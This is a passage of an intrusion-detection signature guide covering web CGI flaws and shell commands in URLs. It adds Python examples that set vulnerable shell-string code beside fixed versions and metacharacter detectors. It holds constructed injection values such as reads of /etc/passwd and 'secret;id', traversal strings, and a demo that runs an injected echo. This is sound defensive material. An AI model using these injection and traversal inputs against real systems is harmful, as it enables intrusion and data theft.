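Signatures 713 (pipe characters in the psunami.cgi topic parameter), 726 and 729 (shell metacharacters in csMailto and bsguest fields), 734 (a semicolon in the vpasswd.cgi password field handed to os.system()), 735 and 739 are all one bug: a CGI builds a command string from request data and hands it to a shell. The following added example, which is not any of those projects' code, shows the os.system()-style construction beside the argument-list form, and the metacharacter check a rule can apply. An 'echo' command stands in for the real password-changing program so the script runs anywhere; the parameter values are constructed.

```python
"""Added example: command injection through shell metacharacters, the
no-shell fix, and the request-side metacharacter check.  Not vpopmail's or
any other project's code; 'echo' is a stand-in and samples are constructed."""
import re
import subprocess


def change_password_vulnerable(user, new_password):
    """One shell string, os.system()-style: the password field can end the
    command and start another."""
    cmd = "echo %s %s" % (user, new_password)   # constructed stand-in for the real tool
    out = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return out.stdout


def change_password_fixed(user, new_password):
    """Argument list and no shell, so metacharacters stay data; plus an
    allow-list on the user name, the field that selects a target."""
    if not re.fullmatch(r"[A-Za-z0-9._-]{1,64}@[A-Za-z0-9.-]{1,253}", user):
        raise ValueError("bad user")
    out = subprocess.run(["echo", user, new_password], capture_output=True, text=True)
    return out.stdout


# Detection side: characters that let a value escape its argument when a CGI
# passes it to /bin/sh via system(), popen() or backticks.
_SHELL_META = re.compile(r"[;|&`$\n\r]|\$\(|\|\||&&|\x00")


def has_shell_metachars(value):
    return _SHELL_META.search(value) is not None


# Constructed parameter values, one per signature pattern above.
SAMPLES = {
    "psunami topic":    "|id|",
    "bsguest email":    "bob@example.com;cat /etc/passwd",
    "vpasswd password": "x; echo INJECTED",
    "textcounter path": "$(uname -a)",
    "benign":           "bob@example.com",
}


def demo():
    injected = change_password_vulnerable("alice@example.com", SAMPLES["vpasswd password"])
    safe = change_password_fixed("alice@example.com", SAMPLES["vpasswd password"])
    return {
        "vulnerable_output": injected,
        "fixed_output": safe,
        "flags": {k: has_shell_metachars(v) for k, v in SAMPLES.items()},
    }


if __name__ == "__main__":
    print(demo())
```

In the vulnerable output the second line ('INJECTED') is produced by a command the attacker supplied; in the fixed output the whole field is printed back as a single argument. The metacharacter list is intentionally broad: for a field that should never reach a shell, any of these characters is worth an alert.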
Signature ID: 735
Textcounter.pl Arbitrary Command Execution Vulnerability
Threat Level: Information
Industry ID: CVE-1999-1479 Bugtraq: 2265 Nessus: 11451
Signature Description: TextCounter requires Server Side Includes and displays a text count of the number of
visitors to a page on a web site. The affected version of TextCounter is 1.2. This rule triggers when an attacker
sends a specially-crafted URL request to the textcounter.pl script containing shell metacharacters; an attacker can use this
vulnerability to execute arbitrary code on the server with the privileges of the server process. The issue is fixed in
version 1.2.1. The administrator is advised to update to the latest version of TextCounter (1.2.1, 1.3.1 or later), available
from the vendor's web site.
Signature ID: 736
NetWin WebNEWS Remote Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0290 Bugtraq: 4124 Nessus: 11732
Signature Description: WebNEWS is a server-side application which provides users with web-based access to Internet
news groups. It is compatible with any standard NNTP news server. WebNEWS version 1.1k and prior contain a
buffer overflow vulnerability. This rule triggers when an attacker sends a specially-crafted URL request to
webnews.exe including a string of 1500 bytes or more in the 'group' parameter; a remote attacker can use this
vulnerability to overflow a buffer and execute arbitrary code on the system. The issue is fixed by the appropriate
patch; apply the available patch to remove this issue.
Signature ID: 739
WEB-CGI args.bat access vulnerability
Threat Level: Information
Industry ID: CVE-1999-1180 CVE-1999-1374 Nessus: 11465
Signature Description: This rule triggers when an attacker sends a URL request to the args.bat or args.cmd
example file appended with shell metacharacters; an attacker can use this vulnerability to execute arbitrary commands
on the system. The affected versions of O'Reilly Web Site are 1.1e and 2.0. No remedy available as of September,
2008.
Signature ID: 740
Viralator CGI Input Validation Remote Shell Command Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0849 Bugtraq: 3495 Nessus: 11107
Signature Description: Viralator is a Perl script that virus-scans HTTP/FTP download requests on a UNIX server after
they pass through the Squid proxy server. Viralator versions 0.7, 0.8, and 0.9pre1 contain an improper filtering of
user-supplied CGI parameters vulnerability. This rule triggers when an attacker sends a specially-crafted URL
request to the viralator.cgi script containing escaped shell commands; an attacker can use this vulnerability to execute
arbitrary commands on the server. The issue is fixed in version 0.9pre2 or later. The administrator is advised to
update to the latest version of Viralator (0.9pre2 or later), available from the vendor's web site.
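The four entries above (734, 735, 739 and 740) describe the same flaw: a CGI parameter is pasted into a shell command line, so a semi-colon or other shell metacharacter starts a second command. The following Python is an added example, not code from any of those products or from the TMS module; the "change password" helper and the /usr/bin/vpasswd binary it names are assumptions. It shows the unsafe string-building pattern beside the argument-vector pattern that keeps the shell out of the picture, plus the metacharacter check an IDS rule or input filter would apply.

```python
"""Command injection through shell metacharacters (signatures 734, 735, 739, 740).
Added example; the vpasswd helper and binary path are assumptions."""
import re
import subprocess

# Characters that let a value embedded in a shell command line start a second
# command, redirect output or expand to something else (the guide's
# "shell metacharacters").
SHELL_META = re.compile(r"[;&|`$<>\n\r\\\"'(){}*?~\[\]]")

# Separators a POSIX shell would use to split one line into several commands.
COMMAND_SEPARATORS = re.compile(r"\s*(?:;|&&|\|\||&|\|)\s*")


def unsafe_command_line(user, new_password):
    """The vulnerable pattern: one string handed to an os.system()-style call.
    Returned rather than executed so the effect of a ';' can be inspected."""
    return "/usr/bin/vpasswd %s %s" % (user, new_password)   # assumed binary


def commands_in_shell_string(cmdline):
    """Approximate how a shell would split the string into separate commands."""
    return [c for c in COMMAND_SEPARATORS.split(cmdline) if c]


def contains_shell_metacharacters(value):
    """Detection-side check: does the parameter carry any shell metacharacter?"""
    return SHELL_META.search(value) is not None


def safe_argv(user, new_password):
    """The hardened pattern: validate what must be a plain identifier, then pass
    an argument vector. The password travels as a single argv element, so a
    ';' inside it is data, not a command separator. Raises ValueError."""
    if not re.fullmatch(r"[A-Za-z0-9._@-]{1,64}", user):
        raise ValueError("invalid user name")
    if "\x00" in new_password or not new_password:
        raise ValueError("invalid password")
    return ["/usr/bin/vpasswd", user, new_password]   # assumed binary


def run_safely(user, new_password):
    """Execute the argv without a shell (shell=False is the default for a list).
    Not exercised by the checks below because the binary is assumed."""
    return subprocess.run(safe_argv(user, new_password), check=False)


if __name__ == "__main__":
    injected = "secret;id"                       # constructed sample value
    print(commands_in_shell_string(unsafe_command_line("bob", injected)))
    print(safe_argv("bob", injected))
    print(contains_shell_metacharacters(injected))
```

With the constructed value `secret;id`, the unsafe string splits into two commands while the argv form keeps it as one argument; the metacharacter check is what a rule like 734 keys on, and a server-side filter can use the same test before any shell is involved.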
Signature ID: 742
Netscape Enterprise Server REVLOG Command Access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0251 Bugtraq: 2294
Signature Description: Netscape Enterprise Server is a web server used to host large-scale web sites. This directory is
accessible by remote or local users without any authentication. Netscape Enterprise Server version 3.0.0 contains a
denial of service vulnerability. This rule triggers when an attacker connects to the server and submits a specially-crafted
'REVLOG /HTTP/1.0' command, causing the server to crash. No remedy available as of September, 2008.
Signature ID: 743
Ceilidh textcgi.exe cross-site scripting Vulnerability
Threat Level: Information
Industry ID: CVE-2003-1531 Bugtraq: 7214
Signature Description: Ceilidh is a web-based threaded discussion engine that features automatic text to HTML
conversion, file attachments, e-mail notification, automatic message expiration, and multiple levels of security. Ceilidh
version 2.70 and prior contain a cross-site scripting vulnerability. This rule triggers when an attacker creates a
specially-crafted URL request containing malicious script to the test.cgi file. When the link is clicked or a user visits a
malicious web site, the script code is executed in the user's browser session. An attacker could use this vulnerability to
steal the victim's cookie-based authentication credentials. No remedy available as of September, 2008.
Signature ID: 745
Webadmin.dll detection vulnerability
Threat Level: Information
Industry ID: CVE-2003-0471 CVE-2003-1463 Bugtraq: 7438,8024 Nessus: 11771
Signature Description: WebAdmin is a web application for administering MDaemon and RelayFax. It can be run on its
own or as an ISAPI application under Microsoft Internet Information Services (IIS). WebAdmin versions prior to 2.0.3
contain a path traversal vulnerability. This rule triggers when an attacker sends a specially-crafted URL request to
the WebAdmin.dll file; an attacker can use this vulnerability to gain unauthorized access to any file on the system. This
issue is fixed in version 2.0.3 or later; upgrade to the fixed version, available from the vendor's web site.
Signature ID: 746
Sambar Server echo.bat Code Execution Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0213 Bugtraq: 1002 Nessus: 10246
Signature Description: The Sambar Server is a multi-threaded HTTP, FTP and proxy server for Windows NT and
Windows 95. Sambar Server 4.2.0beta 7 contains a flaw that may allow a malicious user to execute arbitrary code. The
issue is triggered when additional commands are appended to a request for the "echo.bat" file. An attacker can use this
vulnerability to read, modify, create, or delete any file or directory on the system, including user accounts. The issue is
fixed in Sambar Server version 4.3Beta 8; upgrade to this version, which is available from the vendor's web site.
Signature ID: 747
Oracle 9iAS PORTAL_DEMO ORG_CHART Vulnerability
Threat Level: Warning
Nessus: 11918
Signature Description: Oracle9i Application Server Wireless Edition (Oracle9i AS Wireless Edition) allows carriers,
enterprises, and Internet companies to wirelessly enable. In the installation of Oracle 9iAS, it is possible to access a
demo (PORTAL_DEMO.ORG_CHART) via mod_plsql. Access to these pages should be restricted, because it may be
possible to abuse this demo for SQL injection attacks.
Signature ID: 748
Fpcount.exe Buffer Overflow Vulnerability
Threat Level: Information
Industry ID: CVE-1999-1376 Bugtraq: 2252 Nessus: 11370
Signature Description: Fpcount.exe is a site visit counter included with Internet Information Server. IIS (Internet
Information Server) is a group of Internet servers (including a Web or Hypertext Transfer Protocol server and a File
Transfer Protocol server) developed by Microsoft. Microsoft Internet Information Server version 4.0 contains a buffer
overflow vulnerability that could allow a user to execute arbitrary code on a running server. The problem lies in a
buffer overflow in the fpcount.exe binary. It is possible to exploit the buffer overflow in fpcount.exe remotely, thus
overwriting stack variables, including the return address.
Signature ID: 749
WEB-MISC IBM Net.Commerce orderdspc.d2w access vulnerability
Threat Level: Information
Industry ID: CVE-2001-0319 Bugtraq: 2350
Signature Description: IBM Net.Commerce enables businesses to quickly, easily, and securely conduct electronic
commerce on the World Wide Web. IBM Net.Commerce version 3.1.2 could allow an attacker to gain access to
sensitive information. This rule triggers when an attacker sends a specially-crafted HTTP request to the
orderdspc.d2w macro to gain access to sensitive information in the Net.Commerce database. An attacker can use this
vulnerability to gain access to administrative accounts and user password files. The issue is fixed in version 3.2 or
later. The administrator is advised to update to the latest version of IBM Net.Commerce (3.2 or later), available from
the vendor's web site.
Signature ID: 750
Ad.cgi Unchecked Input Vulnerability
Threat Level: Information
Industry ID: CVE-2001-0025 Bugtraq: 2103
Signature Description: Ad.cgi is a freely available ad rotation script. Leif M. Wright's ad.cgi version 1.0 contains an
unchecked input vulnerability. This rule triggers when an attacker sends a specially-crafted URL request to
the ad.cgi script containing a FORM variable whose user-supplied input is not properly checked; an attacker can use this
vulnerability to execute arbitrary commands on the system with the privileges of the web server. No remedy available as
of September, 2008.
Signature ID: 751
Mozilla Bonsai multidiff.cgi access vulnerability
Threat Level: Information
Industry ID: CVE-2003-0153 Bugtraq: 5517
Signature Description: Mozilla Bonsai is a tool that allows a user to perform queries on the contents of a CVS archive.
Bonsai version 1.3.0 contains a path disclosure vulnerability. This rule triggers when an attacker sends a request for
the multidiff.cgi script that causes an error message to be returned containing the physical path to the requested
script; an attacker can use this vulnerability to obtain sensitive information.
Signature ID: 752
Stalkerlab's Mailers 1.1.2 CGI Mail Spoofing Vulnerability
Threat Level: Information
Industry ID: CVE-2000-0726 Bugtraq: 1623
Signature Description: Stalker Lab's Mailers package for Windows NT contains the CGImail.exe program, which is
used to convert the contents of an HTML form to an email. Due to specific values in the file, it is possible for a user to
save the web page to disk and modify variables such as $To$, $Attach$ and $File$, causing the program to send any
file saved on the web server to the user; an attacker can use this vulnerability to gain access to confidential data. The
affected versions are Stalkerlab Mailers 1.1.2 and later. No remedy available as of September, 2008.
Signature ID: 753
WEB-PHP readmsg.php access vulnerability
Threat Level: Information
Industry ID: CVE-2001-1408 Nessus: 11073
Signature Description: The Cobalt Qube was a computer server appliance product line. Cobalt Qube 3 WebMail
version 2.0.1 contains a directory traversal vulnerability in readmsg.php. This rule triggers when an attacker sends a
specially-crafted URL to the readmsg.php script containing "dot dot" sequences (/../) in the mailbox parameter to
traverse directories; an attacker can use this vulnerability to view the contents of files readable by the web server user.
No remedy available as of September, 2008.
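The readmsg.php entry above, like the /WEB-INF/ and WebAdmin.dll entries, comes down to a file name taken from the request and joined onto a directory the application meant to confine it to. The Python below is an added example, not code from Cobalt Qube WebMail or the TMS module; the mailbox root directory and the parameter name are assumptions. It contrasts the unchecked concatenation with a resolve-then-compare check that decodes percent-encoding first (so `%2e%2e/` is treated like `../`) and rejects any result outside the root.

```python
"""Path confinement for a user-supplied mailbox name (signature 753 and the
/WEB-INF/ and WebAdmin.dll entries). Added example; MAILBOX_ROOT and the
'mailbox' parameter are assumptions."""
import posixpath
from urllib.parse import unquote

MAILBOX_ROOT = "/var/mail/webmail/user1"   # assumed per-user mailbox directory


def vulnerable_mailbox_path(root, mailbox_param):
    """The unchecked pattern the signature describes, reconstructed for
    contrast: decode the parameter and append it to the root as-is."""
    return root + "/" + unquote(mailbox_param)


def resolve_mailbox_path(root, mailbox_param):
    """Return the absolute path the parameter resolves to, or None if it
    escapes root. Decoding happens before normalization so an encoded
    traversal cannot slip past a check made on the raw string."""
    name = unquote(mailbox_param)
    if "\x00" in name:                 # NUL would truncate the path in C code
        return None
    # An absolute name makes posixpath.join discard root; normpath then
    # collapses every '..' lexically so the prefix test below is meaningful.
    joined = posixpath.normpath(posixpath.join(root, name))
    if joined != root and not joined.startswith(root + "/"):
        return None
    return joined


def classify(root, mailbox_param):
    """'ok' when the parameter stays inside root, 'traversal' otherwise."""
    return "ok" if resolve_mailbox_path(root, mailbox_param) else "traversal"


# Constructed sample parameter values (not captured traffic).
SAMPLES = [
    "INBOX",
    "Sent/2009",
    "INBOX/../Sent",                   # steps out and back in: still inside root
    "../../../../etc/passwd",
    "..%2f..%2f..%2fetc%2fpasswd",     # percent-encoded slashes
    "INBOX/../../other_user/INBOX",    # another user's mailbox
    "/etc/passwd",                     # absolute path
]


def report(root=MAILBOX_ROOT, samples=SAMPLES):
    """Map each sample to its classification."""
    return {s: classify(root, s) for s in samples}


if __name__ == "__main__":
    for sample, verdict in report().items():
        print(f"{verdict:9s} {sample!r} -> {resolve_mailbox_path(MAILBOX_ROOT, sample)}")
```

The lexical check is enough for the traversal the signature describes; where the mailbox tree may contain symbolic links, resolve with `os.path.realpath` on a real filesystem and apply the same prefix comparison to the result.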
Signature ID: 754
HTTP Client [shellscript_js.php Clientside] Vulnerability
Threat Level: Information
Signature Description: HTTP (HyperText Transfer Protocol) is a stateless, object-oriented protocol standard for
distributed hypermedia systems, around which the World Wide Web is based. There is a vulnerability in Internet
Explorer. This rule triggers when an attacker sends a specially-crafted URL request to the shellscript_js.php
script; an attacker can use this vulnerability to execute arbitrary code on the web server and when a user views a
malicious web page.
Signature ID: 755
HTTP Client [msits.exe Backdoor] vulnerability
Threat Level: Information
Signature Description: HTTP (HyperText Transfer Protocol) is a stateless, object-oriented protocol standard for
distributed hypermedia systems, around which the World Wide Web is based. There is a vulnerability in Internet
Explorer. This rule triggers when an attacker sends a specially-crafted URL request to msits.exe; an attacker
can use this vulnerability to execute arbitrary code on the web server and when a user views a malicious web page.
Signature ID: 757
WebDAV SEARCH Overflow vulnerability
Threat Level: Information
Industry ID: CVE-2003-0109 Bugtraq: 7116 Nessus: 11413,11412
Signature Description: WebDAV (Web-based Distributed Authoring and Versioning) is a set of extensions to the Hypertext
Transfer Protocol (HTTP) that allows users to collaboratively edit and manage files on remote World Wide Web
servers. Microsoft Windows contains a dynamic link library (DLL) named ntdll.dll. The IIS WebDAV component
uses ntdll.dll when processing incoming WebDAV requests. The WebDAV component of Microsoft IIS version 5.0
contains a buffer overflow vulnerability. This rule triggers when an attacker sends a specially-crafted, overly long
HTTP SEARCH request. An attacker can use this vulnerability to overflow a buffer and execute arbitrary code on the system.
Signature ID: 900
Htgroup file access vulnerability
Threat Level: Information
Signature Description: The attacker tries to gain intelligence on the user and administration groups used on a web
server. The attacker could possibly gain information needed for other attacks from the .htgroup file, which lists the
groups allowed to access resources on a web server. This rule triggers when an attempt is made to send an htgroup
pattern to the HTTP web server.
Signature ID: 901
/bin/ls command web vulnerability
Threat Level: Information
Signature Description: The ls command lists the files and file system layout on a UNIX or Linux based system. The
attacker could possibly gain information needed for other attacks on the host by using the ls command. This rule
triggers when an attempt is made to send a /bin/ls pattern to the HTTP web server.
Signature ID: 903
/bin/ps command web vulnerability
Threat Level: Warning
Signature Description: This rule hits when /bin/sh is sent with white space characters encoded as %20 or + or as a blank
space. The ps command lists the process status of running processes on a UNIX or Linux based system. Using "ps", the
attackers would check for various running system services to exploit or for the presence of security software, such as
host IDS or monitoring scripts. The attacker could possibly gain information needed for other attacks on the system.
This rule triggers when an attempt is made to send a /bin/ps pattern to the HTTP web server.
Signature ID: 904
/etc/inetd.conf file web access vulnerability
Threat Level: Severe
Signature Description: The inetd configuration lists the daemons executed at boot time on a UNIX or Linux based
system. The attacker could possibly gain information needed for other attacks on the host. This rule triggers when
an attempt is made to send an /etc/inetd.conf pattern to the HTTP web server.
Signature ID: 905
/etc/motd web access vulnerability
Threat Level: Severe
Signature Description: This is an attempt to gain intelligence about the system hosting a web server. The motd is used
to display system information on a UNIX or Linux based system. The attacker could possibly gain information needed
for other attacks on the host. This rule triggers when an attempt is made to send an /etc/motd pattern to the HTTP web
server.
Signature ID: 906
/etc/shadow web access vulnerability
Threat Level: Severe
Signature Description: The shadow file, usually found in the /etc/ directory on UNIX based systems, contains login
information for users of a host. This file is generally used on multi-user systems to provide greater security for user
passwords and should only be readable by the super user. If an attacker was successful in retrieving this file, they
could then obtain valid login information for the system by using widely available password cracking tools on the file.
Logs will be generated for this signature when an /etc/shadow pattern is sent to the HTTP server.
Signature ID: 907
/usr/bin/cc command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to compile a C or C++ source file on a host. The cc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when a /usr/bin/cc pattern is sent to the HTTP server.
Signature ID: 908
/usr/bin/cpp command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to compile a C or C++ source file on a host. The cc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when /usr/bin/cpp pattern is sent to the http server.
Signature ID: 909
/usr/bin/g++ command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to compile a C or C++ source file on a host. The g++ command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when /usr/bin/g++ pattern is sent to the http server.
Signature ID: 910
/usr/bin/gcc command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to compile a C or C++ source file on a host. The gcc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when a /usr/bin/gcc pattern is sent to the HTTP server.
Signature ID: 911
/usr/bin/id command web execute vulnerability
Threat Level: Severe
Signature Description: Id is a UNIX command that returns information about the system's users and groups. This
information is valuable to an attacker, who can use it to plan further attacks based on the users' possible login
information or to be more effective in targeting specific users and groups who possess elevated privileges. The id
command returns information on the user and the user's "gid" and "uid". Logs will be generated for this signature
when a /usr/bin/id pattern is sent to the HTTP server.
Signature ID: 912
/usr/bin/perl command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to execute a Perl script on a host. Perl is a scripting language that is available
on a wide variety of platforms. By default Perl code runs with full access to all libraries and inbuilt commands available
to the language. When combined with the access permissions of the user executing the script, the consequences of
running arbitrary code can be devastating. Logs will be generated for this signature when a /usr/bin/perl pattern is sent to
the HTTP server.
Signature ID: 913
X server display parameter vulnerability
Threat Level: Severe
Signature Description: This rule generates an event when an X Windows system command is used with a parameter to
set the display location over a plain-text (unencrypted) connection on one of the specified web ports to the target web
server. The "display" parameter is used to specify an address for the X server to listen for connections.
Signature ID: 914
/bin/nasm command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to compile a program source on a host using NASM (Netwide Assembler),
which is capable of compiling a variety of sources on a variety of platforms into executable binary files. The attacker
could possibly compile a program needed for other attacks on the system or install a binary program. This rule
triggers when an attempt is made to send a /bin/nasm pattern.
Signature ID: 915
Bin/python command web execute vulnerability
Threat Level: Severe
Signature Description: Python is a dynamic object-oriented programming language that can be used for many kinds of
software development. It offers strong support for integration with other languages and tools, and comes with extensive
standard libraries. This is an attempt to execute an arbitrary Python script outside its designated web root or cgi-bin by
issuing a bin/python command to the web server.
Signature ID: 916
Bin/tclsh command web execute vulnerability
Threat Level: Severe
Signature Description: Tclsh is a shell-like application that reads Tcl commands from its standard input or from a file
and evaluates them. If invoked with no arguments it runs interactively, reading Tcl commands from standard input
and printing command results and error messages to standard output. It runs until the exit command is invoked or until
it reaches end-of-file on its standard input. This rule triggers when an attempt is made to send a bin/tclsh pattern
via web clients.
Signature ID: 917
Cc command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to compile a C or C++ source file on a host. The "cc" command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. This
rule generates an event when an attacker sends a "cc" pattern to the HTTP server.
Signature ID: 918
Chgrp command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to change file permissions on a machine. Using the "chgrp" command an attacker
may change the permissions of a file to suit his own needs, making a file readable, writeable or executable to other groups
and users that would otherwise not have these special permissions. Logs will be generated for this signature when a
"/bin/chgrp" pattern is sent to the HTTP server.
Signature ID: 919
Chmod command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to change file permissions on a machine. Using the "chmod" command an
attacker may change the permissions of a file to suit his own needs, making a file readable, writeable or executable to
other groups and users that would otherwise not have these special permissions. Logs will be generated for this
signature when a "/bin/chmod" pattern is sent to the HTTP server.
Signature ID: 920
Chown command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to change file ownership permissions on a machine. Using "chown"
command an attacker may change the permissions of a file to suit his own needs, make a file owned by another user
who would otherwise not have these special permissions. Logs will be generated for this signature when "chown"
pattern is sent to http server.
Signature ID: 921
Chsh command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to change a user's shell on a machine. Using the "chsh" command an attacker may
change the shell of a user to suit his own needs. By changing the shell an attacker may further compromise a machine
by specifying a shell that could contain a Trojan Horse component or that could contain embedded commands specially
crafted by an attacker. Logs will be generated for this signature when a /usr/bin/chsh pattern is sent to the HTTP server.
Signature ID: 922
WEB-ATTACKS conf/httpd.conf vulnerability
Threat Level: Severe
Signature Description: The httpd.conf file lists the configuration of the web server including modules loaded on start
and access authorization files. The attacker can make a standard HTTP request that contains 'conf/httpd.conf' in the
URI and gain information needed for other attacks on the host. Logs will be generated for this signature when
"conf/httpd.conf" pattern is sent to the http server.
Signature ID: 923
Cpp command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to compile a C or C++ source file on a host. The cc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when "cpp" pattern is sent to the http server.
Signature ID: 925
G++ command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to compile a C or C++ source file on a host. The g++ command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when "g++" pattern is sent to the http server.
Signature ID: 926
Gcc command web execute vulnerability
Threat Level: Warning
Signature Description: This is an attempt to compile a C or C++ source file on a host. The gcc command is the GNU
project's C and C++ compiler used to compile C and C++ source files into executable binary files. The attacker could
possibly compile a program needed for other attacks on the system or install a binary program of his choosing. Logs
will be generated for this signature when a "gcc" pattern is sent to the HTTP server.
Signature ID: 927
Id command web execute vulnerability
Threat Level: Warning
Signature Description: Id is a UNIX command that returns information about the system's users and groups. This
information is valuable to an attacker, who can use it to plan further attacks based on the users' possible login
information or to be more effective in targeting specific users and groups who possess elevated privileges. The id
command returns information on the user and the user's "gid" and "uid". Logs will be generated for this signature
when an id pattern is sent to the HTTP server.
Signature ID: 928
Kill command web execute vulnerability
Threat Level: Severe
Signature Description: This is an attempt to either stop or restart system processes on a web server. By stopping a
service the attacker can effectively issue a "Denial of Service" to a particular process on a machine. When used to
restart a process, the attacker can force a legitimate process to re-read the associated configuration file and possibly
compromise the service by replacing the original configuration with one crafted by the attacker. The presence of the
"kill" command in web traffic indicates that an attacker is attempting to trick the web server into executing it in
non-interactive mode.
Signature ID: 929
Lsof command web execute vulnerability
Threat Level: Severe
Signature Description: This rule generates an event when an "lsof" command is used over a plain-text connection on one
of the specified web ports to the target web server. The "lsof" command lists information about files that are open by
the running processes. An open file may be a regular file, a directory, a block special file, a character special file, an
executing text reference, a library, a stream or a network file. The attacker could possibly gain information needed for
other attacks on the system.
Signature ID: 930
HTTP mail command web execute vulnerability
Threat Level: Severe
Signature Description: This rule generates an event when a "mail" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "mail" command is used to read and send email on UNIX
systems. The presence of the "mail" command in the URL indicates that an attacker attempted to trick the web server
into executing a system command in non-interactive mode.
Signature ID: 932
WEB-ATTACKS netcat command vulnerability
Threat Level: Warning
Signature Description: This rule generates an event when a "netcat" command is used over a plain-text connection on
one of the specified web ports to the target web server. The "netcat" command may be used to establish an interactive
shell session to the machine and also to transfer files over the connection. The presence of the "netcat" command in the
URI indicates that an attacker attempted to trick the web server into executing system commands in non-interactive mode.
Signature ID: 933
Nmap command web execute vulnerability
Threat Level: Warning
Signature Description: This rule generates an event when an "nmap" command is used over a plain-text (unencrypted)
connection on one of the specified web ports to the target web server. The "nmap" command may be used to discover
open ports, services and operating system information on hosts. The presence of the "nmap" command in the URI
indicates that an attacker is attempting to trick the web server into executing system commands in non-interactive mode.
Signature ID: 934
WEB-ATTACKS nt admin addition vulnerability
Threat Level: Information
Signature Description: This rule generates an event when an attempt is made to gain unauthorized access to a web
server or an application running on a web server. Some applications do not perform stringent checks when validating
the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access
and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust
relationships between the victim server and other hosts can be exploited by the attacker.
Signature ID: 935
Perl Web Execution Vulnerability
Threat Level: Warning
Signature Description: This is an attempt to execute a Perl script on a host. Perl is a scripting language that is available
on a wide variety of platforms. By default Perl code runs with full access to all libraries and inbuilt commands available
to the language. When combined with the access permissions of the user executing the script, the consequences of
running arbitrary code can be devastating.
Signature ID: 936
Ping command web execute vulnerability
Threat Level: Warning
Signature Description: This rule generates an event when a "ping" command is used over a plain-text (unencrypted)
connection on one of the specified web ports to the target web server. The "ping" command may be used to perform
information gathering activities.
Signature ID: 937
/bin/ps command web execute vulnerability
Threat Level: Information
Signature Description: The ps command lists the process status of running processes on a UNIX or Linux based
system. Using "ps", the attackers would check for various running system services to exploit or for the presence of
security software, such as host IDS or monitoring scripts. The attacker could possibly gain information needed for other
attacks on the system. This rule triggers when an attempt is made to send a /bin/ps pattern to the HTTP web server.
Signature ID: 938
WEB-ATTACKS python access vulnerability
Threat Level: Warning
Industry ID: CVE-2005-3302 Bugtraq: 17663
Signature Description: This is an attempt to execute a Python script on a host. Python is a scripting language that is
available on a wide variety of platforms. By default Python code runs with full access to all libraries and inbuilt
commands available to the language. When combined with the access permissions of the user executing the script, the
consequences of running arbitrary code can be devastating. Logs will be generated for this signature when a python
pattern is sent to the HTTP server.
Signature ID: 939
Remove (rm) Command in URI vulnerability
Threat Level: Warning
Signature Description: This is an attempt to remove files on a machine. Using the "rm" command an attacker may delete
files on a machine. The attacker can make a standard HTTP request that contains "rm" in the URI, which can then delete
files present on the host. The command may also be run on a command line should the attacker gain access to the
machine. This rule generates an event when a request containing the "rm" command is sent to an HTTP server.
Signature ID: 940
Tclsh web execution vulnerability
Threat Level: Warning
Signature Description: This is an attempt to execute a 'tclsh' command or script on a web server. tclsh is a shell
application that reads Tcl commands and evaluates them. The attacker could possibly execute a command or script on
the host. This rule generates an event when the tclsh pattern is sent to an HTTP server.
Signature ID: 941
Tftp command web execute vulnerability
Threat Level: Warning
Signature Description: Trivial File Transfer Protocol (TFTP) is a very simple file transfer protocol offering the
functionality of a very basic form of FTP. This rule triggers on a possible attempt to use the tftp command from a web
server to retrieve sensitive files or to gather information. It is also possible that an attempt is being made to remotely
boot or reboot a device using tftp.
Signature ID: 942
WEB-ATTACKS traceroute command Vulnerability
Threat Level: Warning
Signature Description: Traceroute is a network tool used to determine the route taken by packets across an IP
network. The traceroute tool is available on practically all Unix-like operating systems. This rule looks for the
"traceroute" command in client-to-web-server traffic but does not indicate whether the command was actually
successful. The presence of the "traceroute" command in the URI indicates that an attacker attempted to trick the
web server into executing system commands in non-interactive mode, i.e. without a valid shell session.
Signature ID: 943
Uname -a command web execute Vulnerability
Threat Level: Warning
Signature Description: Uname is a UNIX command that returns information about the operating system, the
machine's architecture, the processor architecture and the version level of the software in use. This information is
valuable to an attacker, who can use it to plan further attacks based on possible vulnerabilities in the machine's
operating system. This rule generates an event when the "uname" pattern is sent to an HTTP server.
Signature ID: 944
WGet NTLM Username Buffer Overflow Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-3185 Bugtraq: 15102
Signature Description: Wget is GNU software that retrieves files using HTTP, HTTPS and FTP. wget 1.10.1 is
